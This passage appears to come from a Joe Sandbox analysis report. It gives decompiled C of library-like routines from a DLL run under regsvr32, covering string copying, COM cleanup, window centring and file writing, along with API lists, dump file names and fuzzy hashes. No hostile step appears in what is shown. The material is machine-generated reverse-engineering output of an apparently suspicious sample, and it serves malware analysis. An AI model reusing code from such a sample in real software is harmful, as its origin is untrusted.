						__eflags =  *((intOrPtr*)(_v8 + 0x18)) - 0xffffffff;
						if(__eflags != 0) {
							_a8 = _t79 + _t73;
							E10048C16(_t79 + _t73,  &_v268, 0x104);
							_t66 = 0x104 - _t79;
							__eflags = _t66;
							lstrcpynA(_a8,  &_v268, _t66);
							E10047A12(__eflags, _t73,  *((intOrPtr*)(_v8 + 0x18)), _a20);
						}
						L7:
						E10045D9D(_a4, __eflags, 0xffffffff);
						_t46 = 1;
						return _t46;
					}
					 *(_t43 + _t73) =  *(_t43 + _t73) & 0x00000000;
					_a11 =  *((intOrPtr*)(_t79 + _t73));
					_a16 = _t43 + _t73;
					_t54 = lstrcmpiA(_a12, _t73);
					asm("sbb eax, eax");
					_t56 =  ~_t54 + 1;
					__eflags = _t56;
					_a12 = _t56;
					 *((char*)(_t79 + _t73)) = _a11;
					if(_t56 == 0) {
						goto L5;
					}
					E10048C16(_a16,  &_v268, 0x104);
					lstrcpynA(_t73,  &_v268, 0x104);
					goto L7;
				}
				return 0;
			}

0x10047d1d
0x10047d20
0x10047d2a
0x10047d43
0x10047d4f
0x10047d5a
0x10047d61
0x10047d6b
0x10047d6d
0x10047d70
0x10047d72
0x10047dbe
0x10047dc1
0x10047dc5
0x10047dd3
0x10047dd6
0x10047ddb
0x10047ddb
0x10047de8
0x10047df8
0x10047df8
0x10047dfd
0x10047e02
0x10047e09
0x00000000
0x10047e0b
0x10047d77
0x10047d81
0x10047d84
0x10047d87
0x10047d8f
0x10047d91
0x10047d91
0x10047d92
0x10047d98
0x10047d9b
0x00000000
0x00000000
0x10047da8
0x10047db6
0x00000000
0x10047db6
0x00000000

APIs

lstrcpyA.KERNEL32(00000000,00000000,00000104), ref: 10047D4F
lstrlenA.KERNEL32(00000000,00000000,00000000,00000000), ref: 10047D65
lstrcmpiA.KERNEL32(?,00000000), ref: 10047D87
lstrcpynA.KERNEL32(00000000,?,00000104,?,?,00000104), ref: 10047DB6

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: lstrcmpilstrcpylstrcpynlstrlen
String ID:
API String ID: 4224384254-0
Opcode ID: 89fa47185fcf5f7a97023df184d75e57670460d122fece5588864c4724ade299
Instruction ID: 0fd2134c7d528a40db8e4d3f3c5f7d72c0b0dbb512128d883f50bbcd01aa79dd
Opcode Fuzzy Hash: 89fa47185fcf5f7a97023df184d75e57670460d122fece5588864c4724ade299
Instruction Fuzzy Hash: 86316D75904259AFDB10CFA8CC88EEE3BB8FF48354F200169F959DB191D670AE90DB60

Uniqueness

Uniqueness Score: -1.00%

Function 10012BEB Relevance: 6.2, APIs: 4, Instructions: 181
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E10012BEB(intOrPtr __ecx, void* __edi) {
				intOrPtr* _t74;
				intOrPtr* _t75;
				intOrPtr _t76;
				intOrPtr* _t77;
				void* _t78;
				intOrPtr* _t91;
				intOrPtr* _t108;
				intOrPtr* _t109;
				intOrPtr* _t111;
				intOrPtr* _t113;
				intOrPtr* _t115;
				intOrPtr* _t117;
				signed int _t120;
				intOrPtr* _t134;
				intOrPtr* _t135;
				void* _t149;
				intOrPtr _t150;
				signed int _t153;
				void* _t154;
				intOrPtr* _t155;
				intOrPtr _t157;
				intOrPtr* _t158;
				void* _t160;

				_t149 = __edi;
				E1001A9E0(0x1007757b, _t160);
				_t157 = __ecx;
				 *((intOrPtr*)(_t160 - 0x20)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x1007e528;
				_t120 = 0;
				 *(_t160 - 4) = 0;
				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
					_t108 =  *((intOrPtr*)(__ecx + 0x50));
					if(_t108 != 0) {
						_t109 =  *_t108;
						_push(_t160 - 0x18);
						_push(0x10082280);
						_push(_t109);
						if( *((intOrPtr*)( *_t109))() >= 0) {
							_t111 =  *((intOrPtr*)(_t160 - 0x18));
							 *((intOrPtr*)(_t160 - 0x10)) = 0;
							_push(_t160 - 0x10);
							_push(0x100817d0);
							_push(_t111);
							if( *((intOrPtr*)( *_t111 + 0x10))() >= 0) {
								_t115 =  *((intOrPtr*)(_t160 - 0x10));
								 *((intOrPtr*)( *_t115 + 0x18))(_t115,  *((intOrPtr*)(__ecx + 0x58)));
								_t117 =  *((intOrPtr*)(_t160 - 0x10));
								 *((intOrPtr*)( *_t117 + 8))(_t117);
							}
							_t113 =  *((intOrPtr*)(_t160 - 0x18));
							 *((intOrPtr*)( *_t113 + 8))(_t113);
						}
					}
				}
				_push(_t149);
				L7:
				if( *((intOrPtr*)(_t157 + 0x24)) != _t120) {
					_t155 =  *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x1c)) + 8));
					 *((intOrPtr*)( *((intOrPtr*)( *_t155)) + 0xb8))( *((intOrPtr*)(_t155 + 8)), _t120);
					 *((intOrPtr*)( *_t155 + 0x90)) = _t120;
					goto L7;
				}
				 *((intOrPtr*)(_t160 - 0x1c)) = _t157 + 0x18;
				E1003DB38(_t157 + 0x18);
				__eflags =  *((intOrPtr*)(_t157 + 0x40)) - _t120;
				if( *((intOrPtr*)(_t157 + 0x40)) == _t120) {
					L15:
					_t74 =  *((intOrPtr*)(_t157 + 8));
					__eflags = _t74 - _t120;
					if(_t74 != _t120) {
						 *((intOrPtr*)( *_t74 + 8))(_t74);
					}
					_t75 =  *((intOrPtr*)(_t157 + 0xc));
					__eflags = _t75 - _t120;
					if(_t75 != _t120) {
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					__eflags =  *((intOrPtr*)(_t157 + 0x14)) - _t120;
					if( *((intOrPtr*)(_t157 + 0x14)) == _t120) {
						L29:
						_t76 =  *((intOrPtr*)(_t157 + 0x34));
						__eflags = _t76 - _t120;
						if(_t76 != _t120) {
							__imp__CoTaskMemFree(_t76);
						}
						_t124 =  *((intOrPtr*)(_t157 + 0x54));
						__eflags =  *((intOrPtr*)(_t157 + 0x54)) - _t120;
						if( *((intOrPtr*)(_t157 + 0x54)) != _t120) {
							_push( *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x50)))));
							E10012DCB(_t124);
							E10012EEC( *((intOrPtr*)(_t157 + 0x54)));
						}
						_t150 =  *((intOrPtr*)(_t157 + 0x54));
						__eflags = _t150 - _t120;
						if(_t150 != _t120) {
							E10012EEC(_t150);
							E10046018(_t150);
						}
						_t151 =  *((intOrPtr*)(_t157 + 0x50));
						__eflags =  *((intOrPtr*)(_t157 + 0x50)) - _t120;
						if(__eflags != 0) {
							E10012E52(_t151, __eflags);
							E10046018(_t151);
						}
						_t77 =  *((intOrPtr*)(_t157 + 0x4c));
						__eflags = _t77 - _t120;
						if(_t77 != _t120) {
							 *((intOrPtr*)( *_t77 + 8))(_t77);
						}
						_t158 =  *((intOrPtr*)(_t157 + 0x48));
						__eflags = _t158 - _t120;
						if(_t158 != _t120) {
							 *((intOrPtr*)( *_t158 + 8))(_t158);
						}
						_t68 = _t160 - 4;
						 *_t68 =  *(_t160 - 4) | 0xffffffff;
						__eflags =  *_t68;
						_t78 = E1003DB58( *((intOrPtr*)(_t160 - 0x1c)));
						 *[fs:0x0] =  *((intOrPtr*)(_t160 - 0xc));
						return _t78;
					} else {
						__eflags =  *((intOrPtr*)(_t157 + 0x10)) - _t120;
						 *((intOrPtr*)(_t160 - 0x14)) = _t120;
						if( *((intOrPtr*)(_t157 + 0x10)) <= _t120) {
							L28:
							__imp__CoTaskMemFree( *((intOrPtr*)(_t157 + 0x14)));
							goto L29;
						}
						_t153 = 0;
						__eflags = 0;
						do {
							_t91 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x14)) + _t153 + 0x24)) + 4));
							while(1) {
								__eflags = _t91 - _t120;
								if(_t91 == _t120) {
									goto L25;
								}
								_t135 = _t91;
								_t91 =  *_t91;
								 *((intOrPtr*)( *((intOrPtr*)(_t135 + 8)) + 0x90)) = _t120;
							}
							L25:
							E1003DB38( *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x14)) + _t153 + 0x24)));
							_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x14)) + _t153 + 0x24));
							__eflags = _t134 - _t120;
							if(_t134 != _t120) {
								 *((intOrPtr*)( *_t134 + 4))(1);
							}
							 *((intOrPtr*)(_t160 - 0x14)) =  *((intOrPtr*)(_t160 - 0x14)) + 1;
							_t153 = _t153 + 0x28;
							__eflags =  *((intOrPtr*)(_t160 - 0x14)) -  *((intOrPtr*)(_t157 + 0x10));
						} while ( *((intOrPtr*)(_t160 - 0x14)) <  *((intOrPtr*)(_t157 + 0x10)));
						goto L28;
					}
				}
				_t154 = 0;
				__eflags =  *(_t157 + 0x38) - _t120;
				if(__eflags <= 0) {
					L13:
					if(__eflags != 0) {
						E10046018( *((intOrPtr*)(_t157 + 0x3c)));
						E10046018( *((intOrPtr*)(_t157 + 0x40)));
					}
					goto L15;
				} else {
					goto L11;
				}
				do {
					L11:
					__imp__#9(_t120 +  *((intOrPtr*)(_t157 + 0x40)));
					_t154 = _t154 + 1;
					_t120 = _t120 + 0x10;
					__eflags = _t154 -  *(_t157 + 0x38);
				} while (_t154 <  *(_t157 + 0x38));
				_t120 = 0;
				__eflags =  *(_t157 + 0x38);
				goto L13;
			}

0x10012beb
0x10012bf0
0x10012bfa
0x10012bfc
0x10012bff
0x10012c05
0x10012c0a
0x10012c0d
0x10012c0f
0x10012c14
0x10012c16
0x10012c1b
0x10012c1c
0x10012c23
0x10012c28
0x10012c2a
0x10012c30
0x10012c33
0x10012c36
0x10012c3b
0x10012c41
0x10012c43
0x10012c4c
0x10012c4f
0x10012c55
0x10012c55
0x10012c58
0x10012c5e
0x10012c5e
0x10012c28
0x10012c14
0x10012c61
0x10012c62
0x10012c65
0x10012c6b
0x10012c75
0x10012c7d
0x00000000
0x10012c7d
0x10012c88
0x10012c8b
0x10012c90
0x10012c93
0x10012cca
0x10012cca
0x10012ccd
0x10012ccf
0x10012cd4
0x10012cd4
0x10012cd7
0x10012cda
0x10012cdc
0x10012ce1
0x10012ce1
0x10012ce4
0x10012ce7
0x10012d45
0x10012d45
0x10012d48
0x10012d4a
0x10012d4d
0x10012d4d
0x10012d53
0x10012d56
0x10012d58
0x10012d5d
0x10012d5f
0x10012d67
0x10012d67
0x10012d6c
0x10012d6f
0x10012d71
0x10012d75
0x10012d7b
0x10012d80
0x10012d81
0x10012d84
0x10012d86
0x10012d8a
0x10012d90
0x10012d95
0x10012d96
0x10012d9a
0x10012d9c
0x10012da1
0x10012da1
0x10012da4
0x10012da7
0x10012da9
0x10012dae
0x10012dae
0x10012db4
0x10012db4
0x10012db4
0x10012db8
0x10012dc2
0x10012dca
0x10012ce9
0x10012ce9
0x10012cec
0x10012cef
0x10012d3c
0x10012d3f
0x00000000
0x10012d3f
0x10012cf1
0x10012cf1
0x10012cf3
0x10012cfa
0x10012cfd
0x10012cfd
0x10012cff
0x00000000
0x00000000
0x10012d01
0x10012d03
0x10012d08
0x10012d08
0x10012d10
0x10012d17
0x10012d1f
0x10012d23
0x10012d25
0x10012d2b
0x10012d2b
0x10012d2e
0x10012d31
0x10012d37
0x10012d37
0x00000000
0x10012cf3
0x10012ce7
0x10012c95
0x10012c97
0x10012c9a
0x10012cb6
0x10012cb6
0x10012cbb
0x10012cc3
0x10012cc9
0x00000000
0x00000000
0x00000000
0x00000000
0x10012c9c
0x10012c9c
0x10012ca2
0x10012ca8
0x10012ca9
0x10012cac
0x10012cac
0x10012cb1
0x10012cb3
0x00000000

APIs

__EH_prolog.LIBCMT ref: 10012BF0
VariantClear.OLEAUT32(?), ref: 10012CA2
CoTaskMemFree.OLE32(?), ref: 10012D3F
CoTaskMemFree.OLE32(?), ref: 10012D4D

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: FreeTask$ClearH_prologVariant
String ID:
API String ID: 82050969-0
Opcode ID: 8790200f382558798c706f978153164af472bec9513e51216108d4f7151f76a9
Instruction ID: 884cba74a6939ba5cd52a7c2d1802d1de904577554d72b94539a530a269940f9
Opcode Fuzzy Hash: 8790200f382558798c706f978153164af472bec9513e51216108d4f7151f76a9
Instruction Fuzzy Hash: FF6122B5600646DFCB64CFA8D8C486EB7F6FF48304721086DE6469BA21CB31EC95CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10012F26 Relevance: 6.2, APIs: 4, Instructions: 165
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E10012F26(intOrPtr* __ecx, void* __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				void* __ebp;
				signed int _t58;
				intOrPtr _t60;
				intOrPtr* _t62;
				intOrPtr* _t65;
				intOrPtr _t66;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t86;
				void* _t110;
				void* _t129;
				intOrPtr _t132;
				intOrPtr* _t133;
				intOrPtr* _t134;
				intOrPtr* _t135;
				intOrPtr* _t136;
				intOrPtr* _t137;
				void* _t138;
				void* _t139;

				_t129 = __edx;
				_t137 = __ecx;
				_t132 = E100436AB( *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)) + 0x24)));
				_v12 = _t132;
				_t58 = IsWindowVisible( *(_t132 + 0x1c));
				asm("sbb eax, eax");
				_t60 =  ~_t58 + 1;
				_t110 = 0;
				_v24 = _t60;
				if(_t60 != 0) {
					GetWindowRect( *(E10041F78(_t139, GetDesktopWindow()) + 0x1c),  &_v56);
					GetWindowRect( *(_t132 + 0x1c),  &_v40);
					asm("cdq");
					asm("cdq");
					E10045429(_t132, _v56.right - _v56.left - _t129 >> 1, _v56.bottom - _v56.top - _t129 >> 1, _t110, _t110, _t110);
					E100454B9(_t132, 1);
				}
				_t133 = _t137 + 0x48;
				_push(_t133);
				_push(0x1007e250);
				_t62 =  *((intOrPtr*)( *((intOrPtr*)(_t137 + 4)) + 0x4c));
				_push(_t62);
				if( *((intOrPtr*)( *_t62))() >= 0) {
					_t86 =  *_t133;
					_t136 = _t137 + 0x4c;
					_v8 =  *((intOrPtr*)( *_t86 + 0xc))(_t86, _t110, 0x100818d0, _t136);
					if( *_t136 == _t110) {
						_v8 = 0x80004003;
					}
					if(_v8 >= _t110) {
						L14:
						_t138 = E10013131(_t137);
						if(_v24 != _t110) {
							E10045429(_v12, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, _t110);
							E100454B9(_v12, _t110);
						}
						return _t138;
					} else {
						if(_v24 != _t110) {
							E10045429(_v12, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, _t110);
							E100454B9(_v12, _t110);
						}
						return _v8;
					}
				}
				_t65 =  *((intOrPtr*)( *((intOrPtr*)(_t137 + 4)) + 0x4c));
				_t66 =  *((intOrPtr*)( *_t65))(_t65, 0x1007e260,  &_v16);
				if(_t66 >= _t110) {
					_t67 = _v16;
					 *((intOrPtr*)( *_t67 + 0x14))(_t67,  &_v20);
					_t69 = _v16;
					 *((intOrPtr*)( *_t69 + 8))(_t69);
					_t71 = _v20;
					if(_t71 == _t110) {
						return 0x80004005;
					}
					_t134 = _t137 + 8;
					_v8 =  *((intOrPtr*)( *_t71))(_t71, 0x100822c0, _t134);
					_t73 = _v20;
					 *((intOrPtr*)( *_t73 + 8))(_t73);
					_t66 = _v8;
					if(_t66 >= _t110) {
						_t135 =  *_t134;
						 *((intOrPtr*)( *_t135))(_t135, 0x100822b0, _t137 + 0xc);
						goto L14;
					}
				}
				return _t66;
			}

0x10012f26
0x10012f2e
0x10012f3c
0x10012f3e
0x10012f44
0x10012f4c
0x10012f50
0x10012f51
0x10012f52
0x10012f55
0x10012f6a
0x10012f77
0x10012f88
0x10012f94
0x10012f9a
0x10012fa3
0x10012fa3
0x10012fab
0x10012fae
0x10012faf
0x10012fb4
0x10012fb7
0x10012fbe
0x10012fc0
0x10012fc2
0x10012fd4
0x10012fd7
0x10012fd9
0x10012fd9
0x10012fe3
0x1001308d
0x10013097
0x10013099
0x100130b3
0x100130bc
0x100130bc
0x00000000
0x10012fe9
0x10012fec
0x10013006
0x1001300f
0x1001300f
0x00000000
0x10013014
0x10012fe3
0x10013028
0x1001302e
0x10013032
0x10013038
0x10013042
0x10013045
0x1001304b
0x1001304e
0x10013053
0x00000000
0x10013055
0x1001305e
0x1001306a
0x1001306d
0x10013073
0x10013076
0x1001307b
0x1001307d
0x1001308b
0x00000000
0x1001308b
0x1001307b
0x100130c7

APIs

IsWindowVisible.USER32(?), ref: 10012F44
GetDesktopWindow.USER32 ref: 10012F57
GetWindowRect.USER32(?,?), ref: 10012F6A
GetWindowRect.USER32(?,?), ref: 10012F77

Part of subcall function 10045429: MoveWindow.USER32(?,?,?,00000000,?,?), ref: 10045445

Part of subcall function 100454B9: ShowWindow.USER32(?,?), ref: 100454C7

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Rect$DesktopMoveShowVisible
String ID:
API String ID: 3835705305-0
Opcode ID: fb4625d03a72aaad017d35783084c3f7c1f5a638c0b5d5f05a908ac2fcd1f45c
Instruction ID: 55d82a676823e6838fcd9f0ec76ab9571e5c2231846ba5afe8b9fa191ca8fcd5
Opcode Fuzzy Hash: fb4625d03a72aaad017d35783084c3f7c1f5a638c0b5d5f05a908ac2fcd1f45c
Instruction Fuzzy Hash: C551B875A0010AEFCB05DFA8C994DAEB7B9FF88305B2145A9F605EB251DB31ED41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10026E82 Relevance: 6.1, APIs: 4, Instructions: 135
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10026E82(long _a4, void* _a8, long _a12) {
				intOrPtr* _v8;
				long _v12;
				long _v16;
				signed int _v20;
				void _v1048;
				void** _t66;
				signed int _t67;
				intOrPtr _t69;
				signed int _t70;
				intOrPtr _t71;
				signed int _t73;
				signed int _t80;
				int _t85;
				long _t87;
				intOrPtr* _t91;
				intOrPtr _t97;
				struct _OVERLAPPED* _t101;
				long _t103;
				signed int _t105;
				struct _OVERLAPPED* _t106;

				_t101 = 0;
				_v12 = 0;
				_v20 = 0;
				if(_a12 != 0) {
					_t91 = 0x10095300 + (_a4 >> 5) * 4;
					_t105 = (_a4 & 0x0000001f) + (_a4 & 0x0000001f) * 8 << 2;
					__eflags =  *( *_t91 + _t105 + 4) & 0x00000020;
					if(__eflags != 0) {
						E10026DAA(__eflags, _a4, 0, 2);
					}
					_t66 =  *_t91 + _t105;
					__eflags = _t66[1] & 0x00000080;
					if((_t66[1] & 0x00000080) == 0) {
						_t67 = WriteFile( *_t66, _a8, _a12,  &_v16, _t101);
						__eflags = _t67;
						if(_t67 == 0) {
							_a4 = GetLastError();
						} else {
							_a4 = _t101;
							_v12 = _v16;
						}
						L15:
						_t69 = _v12;
						__eflags = _t69 - _t101;
						if(_t69 != _t101) {
							_t70 = _t69 - _v20;
							__eflags = _t70;
							return _t70;
						}
						__eflags = _a4 - _t101;
						if(_a4 == _t101) {
							L25:
							_t71 =  *_t91;
							__eflags =  *(_t71 + _t105 + 4) & 0x00000040;
							if(( *(_t71 + _t105 + 4) & 0x00000040) == 0) {
								L27:
								 *((intOrPtr*)(E1001CB81())) = 0x1c;
								_t73 = E1001CB8A();
								 *_t73 = _t101;
								L24:
								return _t73 | 0xffffffff;
							}
							__eflags =  *_a8 - 0x1a;
							if( *_a8 == 0x1a) {
								goto L1;
							}
							goto L27;
						}
						_t106 = 5;
						__eflags = _a4 - _t106;
						if(_a4 != _t106) {
							_t73 = E1001CB0E(_a4);
						} else {
							 *((intOrPtr*)(E1001CB81())) = 9;
							_t73 = E1001CB8A();
							 *_t73 = _t106;
						}
						goto L24;
					}
					__eflags = _a12 - _t101;
					_v8 = _a8;
					_a4 = _t101;
					if(_a12 <= _t101) {
						goto L25;
					} else {
						goto L6;
					}
					do {
						L6:
						_t80 =  &_v1048;
						do {
							__eflags = _v8 - _a8 - _a12;
							if(_v8 - _a8 >= _a12) {
								break;
							}
							_v8 = _v8 + 1;
							_t97 =  *_v8;
							__eflags = _t97 - 0xa;
							if(_t97 == 0xa) {
								_v20 = _v20 + 1;
								 *_t80 = 0xd;
								_t80 = _t80 + 1;
								__eflags = _t80;
							}
							 *_t80 = _t97;
							_t80 = _t80 + 1;
							__eflags = _t80 -  &_v1048 - 0x400;
						} while (_t80 -  &_v1048 < 0x400);
						_t103 = _t80 -  &_v1048;
						_t85 = WriteFile( *( *_t91 + _t105),  &_v1048, _t103,  &_v16, 0);
						__eflags = _t85;
						if(_t85 == 0) {
							_a4 = GetLastError();
							break;
						}
						_t87 = _v16;
						_v12 = _v12 + _t87;
						__eflags = _t87 - _t103;
						if(_t87 < _t103) {
							break;
						}
						__eflags = _v8 - _a8 - _a12;
					} while (_v8 - _a8 < _a12);
					_t101 = 0;
					__eflags = 0;
					goto L15;
				}
				L1:
				return 0;
			}

0x10026e8e
0x10026e93
0x10026e96
0x10026e99
0x10026ea8
0x10026eba
0x10026ebd
0x10026ec2
0x10026eca
0x10026ecf
0x10026ed4
0x10026ed6
0x10026eda
0x10026fae
0x10026fb4
0x10026fb6
0x10026fc9
0x10026fb8
0x10026fbb
0x10026fbe
0x10026fbe
0x10026f6a
0x10026f6a
0x10026f6d
0x10026f6f
0x10027005
0x10027005
0x00000000
0x10027005
0x10026f75
0x10026f78
0x10026fdc
0x10026fdc
0x10026fde
0x10026fe3
0x10026ff1
0x10026ff6
0x10026ffc
0x10027001
0x10026fd7
0x00000000
0x10026fd7
0x10026fe8
0x10026feb
0x00000000
0x00000000
0x00000000
0x10026feb
0x10026f7c
0x10026f7d
0x10026f80
0x10026fd1
0x10026f82
0x10026f87
0x10026f8d
0x10026f92
0x10026f92
0x00000000
0x10026f80
0x10026ee3
0x10026ee6
0x10026ee9
0x10026eec
0x00000000
0x00000000
0x00000000
0x00000000
0x10026ef2
0x10026ef2
0x10026ef2
0x10026ef8
0x10026efe
0x10026f01
0x00000000
0x00000000
0x10026f06
0x10026f09
0x10026f0b
0x10026f0e
0x10026f10
0x10026f13
0x10026f16
0x10026f16
0x10026f16
0x10026f17
0x10026f19
0x10026f24
0x10026f24
0x10026f34
0x10026f49
0x10026f4f
0x10026f51
0x10026f9c
0x00000000
0x10026f9c
0x10026f53
0x10026f56
0x10026f59
0x10026f5b
0x00000000
0x00000000
0x10026f63
0x10026f63
0x10026f68
0x10026f68
0x00000000
0x10026f68
0x10026e9b
0x00000000

APIs

WriteFile.KERNEL32(?,?,?,00000000,00000000), ref: 10026F49

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
